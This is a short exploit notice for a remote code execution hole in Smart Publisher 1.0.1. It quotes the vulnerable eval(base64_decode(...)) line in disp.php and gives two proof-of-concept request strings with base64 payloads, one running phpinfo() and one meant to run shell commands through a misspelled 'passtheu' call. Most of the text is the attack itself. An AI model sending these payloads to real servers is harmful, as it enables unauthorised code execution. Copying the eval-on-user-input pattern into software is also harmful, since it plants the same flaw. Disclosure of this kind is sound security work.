Smart Publisher version 1.0.1 suffers from a remote code execution vulnerability in disp.php.
928920a3cfb1bcb940cfdd59c4e7b9107ed1f07415c5a7dcb1f9084f77ab0fcb
###### ###### ############## ###### ###### ######## ##
#### ## ## ## ## ## ## ## ##
######## ## ## ## ######## ## #### ###### ## ## ######## ## ######
## ## ## ## ## ## ## ## #### ## ## ## ## ## ##
########## ## ## ## ########## ## ## ## ########## ## ###### ##
## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## #### ## ## ### ## ## ## ## ## ## ## ##
######### ###### #### ######### ### ###### ########## ###### ########## ###### ##########
######################################################################
### Smart Publisher 1.0.1 (disp.php) Remote Code Execution Exploit ###
### Script : http://sourceforge.net/projects/smart-publisher/ ###
### Vuln Code In '/admin/op/disp.php'In Line '3' ###
### eval("\$v=".base64_decode($filedata).";"); <- Vuln ###
### POC : ###
### /admin/op/disp.php?filedata=cGhwaW5mbygp <= phpinfo() Base64 ###
### ?filedata=cGFzc3RoZXUobHMgLWxpYTtpZDt1bmFtZSAtYSk <= passtheu(ls -lia;id;uname -a)
######################################################################